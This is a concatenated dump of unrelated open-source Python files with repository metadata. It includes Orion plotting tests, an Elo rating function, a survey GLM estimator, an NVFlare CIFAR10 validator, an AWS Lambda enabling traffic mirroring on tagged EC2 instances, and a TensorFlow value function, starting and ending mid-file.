_,
experiment,
):
child = orion.client.create_experiment(
experiment.name, branching={"branch_to": experiment.name}
)
assert child.name == experiment.name
assert child.version == experiment.version + 1
plot = rankings([experiment, child])
# Exps are sorted alphabetically by names.
assert_rankings_plot(
plot, [f"{exp.name}-v{exp.version}" for exp in [experiment, child]]
)
def test_dict_of_experiments(self, monkeypatch):
"""Tests the rankings with renamed experiments"""
mock_experiment_with_random_to_pandas(monkeypatch)
with create_experiment(config, trial_config, ["completed"]) as (
_,
_,
experiment,
):
plot = rankings({"exp-1": experiment, "exp-2": experiment})
assert_rankings_plot(plot, ["exp-1", "exp-2"])
def test_list_of_dict_of_experiments(self, monkeypatch):
"""Tests the rankings with avg of competitions"""
mock_experiment_with_random_to_pandas(monkeypatch)
with create_experiment(config, trial_config, ["completed"]) as (
_,
_,
experiment,
):
plot = rankings(
[{"exp-1": experiment, "exp-2": experiment} for _ in range(10)]
)
assert_rankings_plot(plot, ["exp-1", "exp-2"], with_avg=True)
def test_dict_of_list_of_experiments(self, monkeypatch):
"""Tests the rankings with avg of experiments separated in lists"""
mock_experiment_with_random_to_pandas(monkeypatch)
with create_experiment(config, trial_config, ["completed"]) as (
_,
_,
experiment,
):
plot = rankings({"exp-1": [experiment] * 10, "exp-2": [experiment] * 10})
assert_rankings_plot(plot, ["exp-1", "exp-2"], with_avg=True)
def test_unbalanced_experiments(self, monkeypatch):
"""Tests the regrets with avg of unbalanced experiments"""
mock_experiment_with_random_to_pandas(monkeypatch, unbalanced=True)
with create_experiment(config, trial_config, ["completed"]) as (
_,
_,
experiment,
):
plot = rankings({"exp-1": [experiment] * 10, "exp-2": [experiment] * 10})
assert_rankings_plot(plot, ["exp-1", "exp-2"], with_avg=True, balanced=0)
def test_ignore_uncompleted_statuses(self, monkeypatch):
"""Tests that uncompleted statuses are ignored"""
mock_experiment_with_random_to_pandas(
monkeypatch,
status=[
"completed",
"new",
"reserved",
"completed",
"broken",
"completed",
"interrupted",
"completed",
],
)
with create_experiment(config, trial_config) as (_, _, experiment):
plot = rankings([experiment])
assert_rankings_plot(
plot, [f"{experiment.name}-v{experiment.version}"], balanced=4
)
def test_unsupported_order_key(self):
"""Tests that unsupported order keys are rejected"""
with create_experiment(config, trial_config) as (_, _, experiment):
with pytest.raises(ValueError):
rankings([experiment], order_by="unsupported")
@pytest.mark.usefixtures("version_XYZ")
class TestRegret:
"""Tests the ``regret()`` method provided by the plotly backend"""
def test_requires_argument(self):
"""Tests that the experiment data are required."""
with pytest.raises(ValueError):
regret(None)
def test_returns_plotly_object(self):
"""Tests that the plotly backend returns a plotly object"""
with create_experiment(config, trial_config, ["completed"]) as (
_,
_,
experiment,
):
plot = regret(experiment)
assert type(plot) is plotly.graph_objects.Figure
def test_graph_layout(self):
"""Tests the layout of the plot"""
with create_experiment(config, trial_config, ["completed"]) as (
_,
_,
experiment,
):
plot = regret(experiment)
assert_regret_plot(plot)
def test_experiment_worker_as_parameter(self):
"""Tests that ``Experiment`` is a valid parameter"""
with create_experiment(config, trial_config, ["completed"]) as (
_,
experiment,
_,
):
plot = regret(experiment)
assert_regret_plot(plot)
def test_ignore_uncompleted_statuses(self):
"""Tests that uncompleted statuses are ignored"""
with create_experiment(config, trial_config) as (_, _, experiment):
plot = regret(experiment)
assert_regret_plot(plot)
def test_unsupported_order_key(self):
"""Tests that unsupported order keys are rejected"""
with create_experiment(config, trial_config) as (_, _, experiment):
with pytest.raises(ValueError):
regret(experiment, order_by="unsupported")
@pytest.mark.usefixtures("version_XYZ")
class TestRegrets:
"""Tests the ``regrets()`` method provided by the plotly backend"""
def test_requires_argument(self):
"""Tests that the experiment data are required."""
with pytest.raises(ValueError):
regrets(None)
def test_returns_plotly_object(self, monkeypatch):
"""Tests that the plotly backend returns a plotly object"""
mock_experiment_with_random_to_pandas(monkeypatch)
with create_experiment(config, trial_config, ["completed"]) as (
_,
_,
experiment,
):
plot = regrets([experiment])
assert type(plot) is plotly.graph_objects.Figure
def test_graph_layout(self, monkeypatch):
"""Tests the layout of the plot"""
mock_experiment_with_random_to_pandas(monkeypatch)
with create_experiment(config, trial_config, ["completed"]) as (
_,
_,
experiment,
):
plot = regrets([experiment])
assert_regrets_plot(plot, [f"{experiment.name}-v{experiment.version}"])
def test_list_of_experiments(self, monkeypatch):
"""Tests the regrets with list of experiments"""
mock_experiment_with_random_to_pandas(monkeypatch)
with create_experiment(config, trial_config, ["completed"]) as (
_,
_,
experiment,
):
child = orion.client.create_experiment(
experiment.name, branching={"branch_to": "child"}
)
plot = regrets([experiment, child])
# Exps are sorted alphabetically by names.
assert_regrets_plot(
plot, [f"{exp.name}-v{exp.version}" for exp in [child, experiment]]
)
def test_list_of_experiments_name_conflict(self, monkeypatch):
"""Tests the regrets with list of experiments with the same name"""
mock_experiment_with_random_to_pandas(monkeypatch)
with create_experiment(config, trial_config, ["completed"]) as (
_,
_,
experiment,
):
child = orion.client.create_experiment(
experiment.name, branching={"branch_to": experiment.name}
)
assert child.name == experiment.name
assert child.version == experiment.version + 1
plot = regrets([experiment, child])
# Exps are sorted alphabetically by names.
assert_regrets_plot(
plot, [f"{exp.name}-v{exp.version}" for exp in [experiment, child]]
)
def test_dict_of_experiments(self, monkeypatch):
"""Tests the regrets with renamed experiments"""
mock_experiment_with_random_to_pandas(monkeypatch)
with create_experiment(config, trial_config, ["completed"]) as (
_,
_,
experiment,
):
plot = regrets({"exp-1": experiment, "exp-2": experiment})
assert_regrets_plot(plot, ["exp-1", "exp-2"])
def test_dict_of_list_of_experiments(self, monkeypatch):
"""Tests the regrets with avg of experiments"""
mock_experiment_with_random_to_pandas(monkeypatch)
with create_experiment(config, trial_config, ["completed"]) as (
_,
_,
experiment,
):
plot = regrets({"exp-1": [experiment] * 10, "exp-2": [experiment] * 10})
assert_regrets_plot(plot, ["exp-1", "exp-2"], with_avg=True)
def test_unbalanced_experiments(self, monkeypatch):
"""Tests the regrets with avg of unbalanced experiments"""
mock_experiment_with_random_to_pandas(monkeypatch, unbalanced=True)
with create_experiment(config, trial_config, ["completed"]) as (
_,
_,
experiment,
):
plot = regrets({"exp-1": [experiment] * 10, "exp-2": [experiment] * 10})
assert_regrets_plot(plot, ["exp-1", "exp-2"], with_avg=True, balanced=0)
def test_ignore_uncompleted_statuses(self, monkeypatch):
"""Tests that uncompleted statuses are ignored"""
mock_experiment_with_random_to_pandas(
monkeypatch,
status=[
"completed",
"new",
"reserved",
"completed",
"broken",
"completed",
"interrupted",
"completed",
],
)
with create_experiment(config, trial_config) as (_, _, experiment):
plot = regrets([experiment])
assert_regrets_plot(
plot, [f"{experiment.name}-v{experiment.version}"], balanced=4
)
def test_unsupported_order_key(self):
"""Tests that unsupported order keys are rejected"""
with create_experiment(config, trial_config) as (_, _, experiment):
with pytest.raises(ValueError):
regrets([experiment], order_by="unsupported")
| 2.0625 | 2 |
autodiff/debug_vjp.py | Jakob-Unfried/msc-legacy | 1 | 7824 | import pdb
import warnings
from jax import custom_vjp
@custom_vjp
def debug_identity(x):
"""
acts as identity, but inserts a pdb trace on the backwards pass
"""
warnings.warn('Using a module intended for debugging')
return x
def _debug_fwd(x):
warnings.warn('Using a module intended for debugging')
return x, x
# noinspection PyUnusedLocal
def _debug_bwd(x, g):
pdb.set_trace()
return g
debug_identity.defvjp(_debug_fwd, _debug_bwd)
| 2.28125 | 2 |
mileage.py | vwfinley/mileage | 0 | 7825 | #!/usr/bin/env python
# Some helpful links
# https://docs.python.org/3/library/tkinter.html
# https://www.python-course.eu/tkinter_entry_widgets.php
import tkinter as tk
class Application(tk.Frame):
def __init__(self, root=None):
super().__init__(root)
self.root = root
self.root.title("Mileage")
self.root.geometry("250x125")
self.pack()
self.miles = tk.Entry(self);
self.gallons = tk.Entry(self);
self.mpg = tk.Label(self)
self.init_widgets()
def init_widgets(self):
self.miles.grid(row=0)
tk.Label(self, text="Miles").grid(row=0, column=1)
self.gallons.grid(row=1)
tk.Label(self, text="Gallons").grid(row=1, column=1)
self.mpg.grid(row=2)
tk.Label(self, text="MPG").grid(row=2, column=1)
tk.Button(self, text="Calculate", command = self.calculate).grid(row=3, column=1)
tk.Button(self, text="Quit", command=self.root.destroy).grid(row=4, column=1)
def calculate(self):
self.mpg['text'] = float(self.miles.get()) / float(self.gallons.get())
app = Application(root=tk.Tk())
app.mainloop()
| 4.0625 | 4 |
rankings/elo.py | ulternate/table_tennis_league | 0 | 7826 | def elo(winner_rank, loser_rank, weighting):
"""
:param winner: The Player that won the match.
:param loser: The Player that lost the match.
:param weighting: The weighting factor to suit your comp.
:return: (winner_new_rank, loser_new_rank) Tuple.
This follows the ELO ranking method.
"""
winner_rank_transformed = 10 ** (winner_rank / 400)
opponent_rank_transformed = 10 ** (loser_rank / 400)
transformed_sum = winner_rank_transformed + opponent_rank_transformed
winner_score = winner_rank_transformed / transformed_sum
loser_score = opponent_rank_transformed / transformed_sum
winner_rank = winner_rank + weighting * (
1 - winner_score)
loser_rank = loser_rank - weighting * loser_score
# Set a floor of 100 for the rankings.
winner_rank = 100 if winner_rank < 100 else winner_rank
loser_rank = 100 if loser_rank < 100 else loser_rank
winner_rank = float('{result:.2f}'.format(result=winner_rank))
loser_rank = float('{result:.2f}'.format(result=loser_rank))
return winner_rank, loser_rank
| 3.75 | 4 |
src/samplics/regression/glm.py | samplics-org/samplics | 14 | 7827 | <gh_stars>10-100
from __future__ import annotations
from typing import Any, Callable, Optional, Union
import numpy as np
# import pandas as pd
import statsmodels.api as sm
from samplics.estimation.expansion import TaylorEstimator
from samplics.utils.formats import dict_to_dataframe, fpc_as_dict, numpy_array, remove_nans
from samplics.utils.types import Array, Number, Series, StringNumber
class SurveyGLM:
"""General linear models under complex survey sampling"""
def __init__(self):
self.beta: np.ndarray
@staticmethod
def _residuals(e: np.ndarray, psu: np.ndarray, nb_vars: Number) -> tuple(np.ndarray, Number):
psus = np.unique(psu)
if psus.shape[0] == 1 and e.shape[0] == 1:
raise AssertionError("Only one observation in the stratum")
if psus.shape[0] == 1:
psu = np.arange(e.shape[0])
psus = np.unique(psu)
e_values = np.zeros((psus.shape[0], nb_vars))
for i, p in enumerate(np.unique(psus)):
e_values[i, :] += np.sum(e[psu == p, :], axis=0)
e_means = np.sum(e_values, axis=0) / psus.shape[0]
return np.transpose(e_values - e_means) @ (e_values - e_means), psus.shape[0]
def _calculate_g(
self,
samp_weight: np.ndarray,
resid: np.ndarray,
x: np.ndarray,
stratum: Optional[np.ndarray],
psu: Optional[np.ndarray],
fpc: Union[dict[StringNumber, Number], Number],
glm_scale=Number,
) -> np.ndarray:
e = (samp_weight * resid)[:, None] * x / glm_scale
if psu is None:
psu = np.arange(e.shape[0])
if stratum is None:
e_h, n_h = self._residuals(e=e, psu=psu, nb_vars=x.shape[1])
return fpc * (n_h / (n_h - 1)) * e_h
else:
g_h = np.zeros((x.shape[1], x.shape[1]))
for s in np.unique(stratum):
e_s = e[stratum == s, :]
psu_s = psu[stratum == s]
e_h, n_h = self._residuals(e=e_s, psu=psu_s, nb_vars=x.shape[1])
g_h += fpc[s] * (n_h / (n_h - 1)) * e_h
return g_h
def estimate(
self,
y: Array,
x: Optional[Array] = None,
samp_weight: Optional[Array] = None,
stratum: Optional[Series] = None,
psu: Optional[Series] = None,
fpc: Union[dict[StringNumber, Number], Series, Number] = 1.0,
remove_nan: bool = False,
) -> None:
y = numpy_array(y)
y_temp = y.copy()
x = numpy_array(x) if x is not None else None
psu = numpy_array(psu) if psu is not None else None
if samp_weight is None:
weight_temp = np.ones(y.shape[0])
elif isinstance(samp_weight, (float, int)):
weight_temp = samp_weight * np.ones(y_temp.shape[0])
elif isinstance(samp_weight, np.ndarray):
weight_temp = samp_weight.copy()
else:
weight_temp = np.asarray(samp_weight)
if not isinstance(fpc, dict):
self.fpc = fpc_as_dict(stratum, fpc)
else:
if list(np.unique(stratum)) != list(fpc.keys()):
raise AssertionError("fpc dictionary keys must be the same as the strata!")
else:
self.fpc = fpc
glm_model = sm.GLM(endog=y_temp, exog=x, var_weights=weight_temp)
glm_results = glm_model.fit()
g = self._calculate_g(
samp_weight=samp_weight,
resid=glm_results.resid_response,
x=x,
stratum=stratum,
psu=psu,
fpc=self.fpc,
glm_scale=glm_results.scale,
)
d = glm_results.cov_params()
self.beta = glm_results.params
self.cov_beta = (d @ g) @ d
| 2.125 | 2 |
tests/test_scopes.py | leg100/scopes | 0 | 7828 | <filename>tests/test_scopes.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Tests for `scopes` package."""
import os
print(os.getenv('PYTHONPATH'))
import pytest
from click.testing import CliRunner
from scopes.tasks import tasks, bolt, spout, builder
from scopes.graph import G, build, topological_sort, traverse
from scopes import cli
@pytest.fixture
def response():
"""Sample pytest fixture.
See more at: http://doc.pytest.org/en/latest/fixture.html
"""
# import requests
# return requests.get('https://github.com/audreyr/cookiecutter-pypackage')
def test_content(response):
"""Sample pytest test function with the pytest fixture as an argument."""
# from bs4 import BeautifulSoup
# assert 'GitHub' in BeautifulSoup(response.content).title.string
def test_command_line_interface():
"""Test the CLI."""
runner = CliRunner()
result = runner.invoke(cli.main)
assert result.exit_code == 0
assert 'scopes.cli.main' in result.output
help_result = runner.invoke(cli.main, ['--help'])
assert help_result.exit_code == 0
assert '--help Show this message and exit.' in help_result.output
# t1---
# | |
# v v
# t2 t3
# \ / t4
# v |
# t5<----/
@pytest.fixture
def example():
tasks.clear()
G.clear()
@spout({'x': None})
def t1():
yield {'x': 'east'}
yield {'x': 'west'}
@bolt({'y': None}, lambda d: 'x' in d)
def t2(dep):
return {'y': 1, **dep}
@bolt({'z': None}, lambda d: d == {'x': None})
def t3(dep):
return {'z': 1, **dep}
@spout({'c': None})
def t4():
yield {'c': 4, 'x': 'east'}
yield {'c': 5, 'x': 'west'}
@builder({'a': 2}, lambda _: True, 'x')
def t5(obj, dep):
obj.update(dep)
def test_task_decorator(example):
assert len(tasks) == 5
assert callable(tasks[0].func)
assert tasks[0].obj == {'x': None}
def test_task_dag(example):
build(tasks)
assert len(G) == 5
assert len(G.edges) == 6
def test_task_traversal(example):
build(tasks)
nodes = topological_sort()
results = traverse(nodes)
assert results == {
't1': [{'x': 'east'}, {'x': 'west'}],
't2': [{'x': 'east', 'y': 1}, {'x': 'west', 'y': 1}],
't3': [{'x': 'east', 'z': 1}, {'x': 'west', 'z': 1}],
't4': [{'x': 'east', 'c': 4}, {'x': 'west', 'c': 5}],
't5': [
{'a': 2, 'x': 'east', 'y': 1, 'z': 1, 'c': 4},
{'a': 2, 'x': 'west', 'y': 1, 'z': 1, 'c': 5}
]
}
| 2.328125 | 2 |
timeparse/LunarSolarConverter/__init__.py | tornadoyi/timeparse | 0 | 7829 | # -*- coding: utf-8 -*-
__author__ = 'isee15'
import LunarSolarConverter
converter = LunarSolarConverter.LunarSolarConverter()
def LunarToSolar(year, month, day, isleap = False):
lunar = LunarSolarConverter.Lunar(year, month, day, isleap)
solar = converter.LunarToSolar(lunar)
return (solar.solarYear, solar.solarMonth, solar.solarDay)
def SolarToLunar(year, month, day):
solar = LunarSolarConverter.Solar(year, month, day)
lunar = converter.SolarToLunar(solar)
return (lunar.lunarYear, lunar.lunarMonth, lunar.lunarDay)
def LunarMonthDays(year, month, isleap = False):
converter = LunarSolarConverter.LunarSolarConverter
days = converter.lunar_month_days[year - converter.lunar_month_days[0]]
leap = LunarSolarConverter.GetBitInt(days, 4, 13)
offset = 0
loopend = leap
if not isleap:
if month <= leap or leap == 0:
loopend = month - 1
else:
loopend = month
days = LunarSolarConverter.GetBitInt(days, 1, 12 - loopend) == 1 and 30 or 29
return days
| 3.21875 | 3 |
examples/hello-pt/custom/cifar10validator.py | ArnovanHilten/NVFlare | 155 | 7830 | # Copyright (c) 2021, NVIDIA CORPORATION.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import torch
from torch.utils.data import DataLoader
from torchvision.datasets import CIFAR10
from torchvision.transforms import Compose, ToTensor, Normalize
from nvflare.apis.dxo import from_shareable, DataKind, DXO
from nvflare.apis.executor import Executor
from nvflare.apis.fl_constant import ReturnCode
from nvflare.apis.fl_context import FLContext
from nvflare.apis.shareable import Shareable, make_reply
from nvflare.apis.signal import Signal
from nvflare.app_common.app_constant import AppConstants
from simple_network import SimpleNetwork
class Cifar10Validator(Executor):
def __init__(self, validate_task_name=AppConstants.TASK_VALIDATION):
super(Cifar10Validator, self).__init__()
self._validate_task_name = validate_task_name
# Setup the model
self.model = SimpleNetwork()
self.device = torch.device("cuda") if torch.cuda.is_available() else torch.device("cpu")
self.model.to(self.device)
# Preparing the dataset for testing.
transforms = Compose([
ToTensor(),
Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),
])
self.test_data = CIFAR10(root='~/data', train=False, transform=transforms)
self.test_loader = DataLoader(self.test_data, batch_size=4, shuffle=False)
def execute(self, task_name: str, shareable: Shareable, fl_ctx: FLContext, abort_signal: Signal) -> Shareable:
if task_name == self._validate_task_name:
model_owner = "?"
try:
try:
dxo = from_shareable(shareable)
except:
self.log_error(fl_ctx, "Error in extracting dxo from shareable.")
return make_reply(ReturnCode.BAD_TASK_DATA)
# Ensure data_kind is weights.
if not dxo.data_kind == DataKind.WEIGHTS:
self.log_exception(fl_ctx, f"DXO is of type {dxo.data_kind} but expected type WEIGHTS.")
return make_reply(ReturnCode.BAD_TASK_DATA)
# Extract weights and ensure they are tensor.
model_owner = shareable.get_header(AppConstants.MODEL_OWNER, "?")
weights = {k: torch.as_tensor(v, device=self.device) for k, v in dxo.data.items()}
# Get validation accuracy
val_accuracy = self.do_validation(weights, abort_signal)
if abort_signal.triggered:
return make_reply(ReturnCode.TASK_ABORTED)
self.log_info(fl_ctx, f"Accuracy when validating {model_owner}'s model on"
f" {fl_ctx.get_identity_name()}"f's data: {val_accuracy}')
dxo = DXO(data_kind=DataKind.METRICS, data={'val_acc': val_accuracy})
return dxo.to_shareable()
except:
self.log_exception(fl_ctx, f"Exception in validating model from {model_owner}")
return make_reply(ReturnCode.EXECUTION_EXCEPTION)
else:
return make_reply(ReturnCode.TASK_UNKNOWN)
def do_validation(self, weights, abort_signal):
self.model.load_state_dict(weights)
self.model.eval()
correct = 0
total = 0
with torch.no_grad():
for i, (images, labels) in enumerate(self.test_loader):
if abort_signal.triggered:
return 0
images, labels = images.to(self.device), labels.to(self.device)
output = self.model(images)
_, pred_label = torch.max(output, 1)
correct += (pred_label == labels).sum().item()
total += images.size()[0]
metric = correct/float(total)
return metric
| 1.859375 | 2 |
lambda/enable-traffic-mirroring.py | wrharding/aws-infra | 1 | 7831 | # MIT License
# Copyright (c) 2020-2021 <NAME> (https://www.chrisfarris.com)
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import boto3
from botocore.exceptions import ClientError
import json
import os
import logging
logger = logging.getLogger()
logger.setLevel(getattr(logging, os.getenv('LOG_LEVEL', default='INFO')))
logging.getLogger('botocore').setLevel(logging.WARNING)
logging.getLogger('boto3').setLevel(logging.WARNING)
logging.getLogger('urllib3').setLevel(logging.WARNING)
TAG_KEY=os.getenv('TAG_KEY', default='WireShark')
def handler(event, context):
logger.debug("Received event: " + json.dumps(event, sort_keys=True))
ec2_client = boto3.client('ec2')
mirror_sessions = ec2_client.describe_traffic_mirror_sessions()['TrafficMirrorSessions']
enabled_enis = []
max_session_id = 0
for s in mirror_sessions:
enabled_enis.append(s['NetworkInterfaceId'])
if s['SessionNumber'] > max_session_id:
max_session_id = s['SessionNumber']
response = ec2_client.describe_instances(
Filters=[
{'Name': 'instance-state-name', 'Values': ['running']},
],
MaxResults=1000 # I should never need to paginate.
)
for r in response['Reservations']:
for i in r['Instances']:
if not i['InstanceType'].startswith("t3"):
logger.debug(f"Instance {i['InstanceId']} is not a t3 and does not support Traffic Mirroring")
continue
for tag in i['Tags']:
if tag['Key'] == TAG_KEY:
# See if a mirror session is setup
for eni in i['NetworkInterfaces']:
if eni['NetworkInterfaceId'] not in enabled_enis:
logger.info(f"ENI {eni['NetworkInterfaceId']} on Instance {i['InstanceId']} needs Mirroring Enabled")
max_session_id += 1
enable_traffic_mirroring(ec2_client, eni['NetworkInterfaceId'], i['InstanceId'], max_session_id)
else:
logger.debug(f"ENI {eni['NetworkInterfaceId']} on Instance {i['InstanceId']} is already Enabled")
def enable_traffic_mirroring(ec2_client, eni, instance_id, session_id):
response = ec2_client.create_traffic_mirror_session(
NetworkInterfaceId=eni,
TrafficMirrorTargetId=os.environ['TARGET_ID'],
TrafficMirrorFilterId=os.environ['FILTER_ID'],
SessionNumber=session_id,
Description=f"Enabled by Lambda for {instance_id}"
)
## END OF FUNCTION ##
if __name__ == '__main__':
# Logging idea stolen from: https://docs.python.org/3/howto/logging.html#configuring-logging
# create console handler and set level to debug
ch = logging.StreamHandler()
logger.setLevel(logging.DEBUG)
# create formatter
# formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
formatter = logging.Formatter('%(levelname)s - %(message)s')
# add formatter to ch
ch.setFormatter(formatter)
# add ch to logger
logger.addHandler(ch)
try:
handler(None, None)
except KeyboardInterrupt:
exit(1)
| 1.554688 | 2 |
src/value_function.py | wu6u3/async_trpo | 6 | 7832 | <reponame>wu6u3/async_trpo
"""
State-Value Function
Written by <NAME> (pat-coady.github.io)
Modified by <NAME> (wu6u3) into asynchronous version
"""
import tensorflow as tf
import numpy as np
from sklearn.utils import shuffle
#import os
class NNValueFunction(object):
""" NN-based state-value function """
def __init__(self, obs_dim, hid1_mult, thread_idx, shared_nn):
"""
Args:
obs_dim: number of dimensions in observation vector (int)
hid1_mult: size of first hidden layer, multiplier of obs_dim
"""
self.replay_buffer_x = None
self.replay_buffer_y = None
self.obs_dim = obs_dim
self.hid1_mult = hid1_mult
self.epochs = 10
self.lr = None # learning rate set in _build_graph()
self._thread_idx=thread_idx # -1 for global
self._scope_name = "nn_net_"+str(self._thread_idx)
self._build_graph()
#self.sess = tf.Session(graph=self.g)
#self.sess.run(self.init)
var_refs = [v._ref() for v in self.get_vars()]
self.gradients = tf.gradients(
self.loss, var_refs,
gate_gradients=False,
aggregation_method=None,
colocate_gradients_with_ops=False)
self.apply_gradients=None
self.sync = self.sync_from(shared_nn)
#self. global_fit = self.fit_for_global(x=None, y=None, logger=None)
def _build_graph(self):
""" Construct TensorFlow graph, including loss function, init op and train op """
with tf.variable_scope(self._scope_name) as scope:
self.obs_ph = tf.placeholder(tf.float32, (None, self.obs_dim), 'obs_valfunc')
self.val_ph = tf.placeholder(tf.float32, (None,), 'val_valfunc')
# hid1 layer size is 10x obs_dim, hid3 size is 10, and hid2 is geometric mean
hid1_size = self.obs_dim * self.hid1_mult # default multipler 10 chosen empirically on 'Hopper-v1'
hid3_size = 5 # 5 chosen empirically on 'Hopper-v1'
hid2_size = int(np.sqrt(hid1_size * hid3_size))
# heuristic to set learning rate based on NN size (tuned on 'Hopper-v1')
self.lr = 1e-2 / np.sqrt(hid2_size) # 1e-3 empirically determined
print('Value Params -- h1: {}, h2: {}, h3: {}, lr: {:.3g}'
.format(hid1_size, hid2_size, hid3_size, self.lr))
# 3 hidden layers with tanh activations
out = tf.layers.dense(self.obs_ph, hid1_size, tf.tanh,
kernel_initializer=tf.random_normal_initializer(
stddev=np.sqrt(1 / self.obs_dim)), name="h1")
out = tf.layers.dense(out, hid2_size, tf.tanh,
kernel_initializer=tf.random_normal_initializer(
stddev=np.sqrt(1 / hid1_size)), name="h2")
out = tf.layers.dense(out, hid3_size, tf.tanh,
kernel_initializer=tf.random_normal_initializer(
stddev=np.sqrt(1 / hid2_size)), name="h3")
out = tf.layers.dense(out, 1,
kernel_initializer=tf.random_normal_initializer(
stddev=np.sqrt(1 / hid3_size)), name='output')
self.out = tf.squeeze(out)
self.loss = tf.reduce_mean(tf.square(self.out - self.val_ph)) # squared loss
optimizer = tf.train.AdamOptimizer(self.lr)
self.train_op = optimizer.minimize(self.loss)
#self.init = tf.global_variables_initializer()
self.h1_w, self.h1_b = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, self._scope_name+'/h1')
self.h2_w, self.h2_b = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, self._scope_name+'/h2')
self.h3_w, self.h3_b = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, self._scope_name+'/h3')
self.output_w, self.output_b =tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, self._scope_name+'/output')
scope.reuse_variables()
#self.sess = tf.Session(graph=self.g)
#self.sess.run(self.init)
def fit_for_global(self, x, y, logger):
""" Fit model to current data batch + previous data batch
Args:
x: features
y: target
logger: logger to save training loss and % explained variance
"""
num_batches = max(x.shape[0] // 256, 1)
batch_size = x.shape[0] // num_batches
y_hat = self.predict(sess, x) # check explained variance prior to update
old_exp_var = 1 - np.var(y - y_hat)/np.var(y)
if self.replay_buffer_x is None:
x_train, y_train = x, y
else:
x_train = np.concatenate([x, self.replay_buffer_x])
y_train = np.concatenate([y, self.replay_buffer_y])
self.replay_buffer_x = x
self.replay_buffer_y = y
for e in range(self.epochs):
x_train, y_train = shuffle(x_train, y_train)
for j in range(num_batches):
start = j * batch_size
end = (j + 1) * batch_size
feed_dict = {self.obs_ph: x_train[start:end, :],
self.val_ph: y_train[start:end]}
_, l = sess.run([self.train_op, self.loss], feed_dict=feed_dict)
y_hat = self.predict(sess, x)
loss = np.mean(np.square(y_hat - y)) # explained variance after update
exp_var = 1 - np.var(y - y_hat) / np.var(y) # diagnose over-fitting of val func
logger.log({'ValFuncLoss': loss,
'ExplainedVarNew': exp_var,
'ExplainedVarOld': old_exp_var})
def fit(self, sess, x, y, logger):
""" Fit model to current data batch + previous data batch
Args:
x: features
y: target
logger: logger to save training loss and % explained variance
"""
num_batches = max(x.shape[0] // 256, 1)
batch_size = x.shape[0] // num_batches
y_hat = self.predict(sess, x) # check explained variance prior to update
old_exp_var = 1 - np.var(y - y_hat)/np.var(y)
if self.replay_buffer_x is None:
x_train, y_train = x, y
else:
x_train = np.concatenate([x, self.replay_buffer_x])
y_train = np.concatenate([y, self.replay_buffer_y])
self.replay_buffer_x = x
self.replay_buffer_y = y
for e in range(self.epochs):
x_train, y_train = shuffle(x_train, y_train)
for j in range(num_batches):
start = j * batch_size
end = (j + 1) * batch_size
feed_dict = {self.obs_ph: x_train[start:end, :],
self.val_ph: y_train[start:end]}
_, l = sess.run([self.train_op, self.loss], feed_dict=feed_dict)
y_hat = self.predict(sess, x)
loss = np.mean(np.square(y_hat - y)) # explained variance after update
exp_var = 1 - np.var(y - y_hat) / np.var(y) # diagnose over-fitting of val func
logger.log({'ValFuncLoss': loss,
'ExplainedVarNew': exp_var,
'ExplainedVarOld': old_exp_var})
def predict(self, sess, x):
""" Predict method """
feed_dict = {self.obs_ph: x}
y_hat = sess.run(self.out, feed_dict=feed_dict)
return np.squeeze(y_hat)
#def close_sess(self):
# """ Close TensorFlow session """
# sess.close()
def get_vars(self):
return [self.h1_w, self.h1_b,
self.h2_w, self.h2_b,
self.h3_w, self.h3_b,
self.output_w, self.output_b ]
# weights = []
#name = []
#for tensor in self.g.as_graph_def().node:
# name.append(tensor.name)
#print(name)
#with self.g.as_default() as g:
# with tf.variable_scope(self._scope_name) as scope:
# weights.extend(tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope))
# weights.append(g.get_tensor_by_name('h1/kernel:0'))
# weights.append(g.get_tensor_by_name('h1/bias:0'))
# weights.append(g.get_tensor_by_name('h2/kernel:0'))
# weights.append(g.get_tensor_by_name('h2/bias:0'))
# weights.append(g.get_tensor_by_name('h3/kernel:0'))
# weights.append(g.get_tensor_by_name('h3/bias:0'))
# return weights
def sync_from(self, shared_nn, name=None):
if shared_nn != None:
src_vars = shared_nn.get_vars()
dst_vars = self.get_vars()
sync_ops = []
with tf.name_scope(name, self._scope_name, []) as name:
for(src_var, dst_var) in zip(src_vars, dst_vars):
sync_op = tf.assign(dst_var, src_var)
sync_ops.append(sync_op)
return tf.group(*sync_ops, name=name)
else:
return None
| 2.21875 | 2 |
mdepub/actions/__init__.py | bkidwell/mdepub | 35 | 7833 | <reponame>bkidwell/mdepub
"""mdepub actions -- these modules do the actual work."""
import archive
import clean
import create
import epub
import extract
import html
import newid
import version
| 0.84375 | 1 |
gbe/views/make_bid_view.py | bethlakshmi/gbe-divio-djangocms-python2.7 | 1 | 7834 | from django.views.generic import View
from django.utils.decorators import method_decorator
from django.contrib.auth.decorators import login_required
from django.views.decorators.cache import never_cache
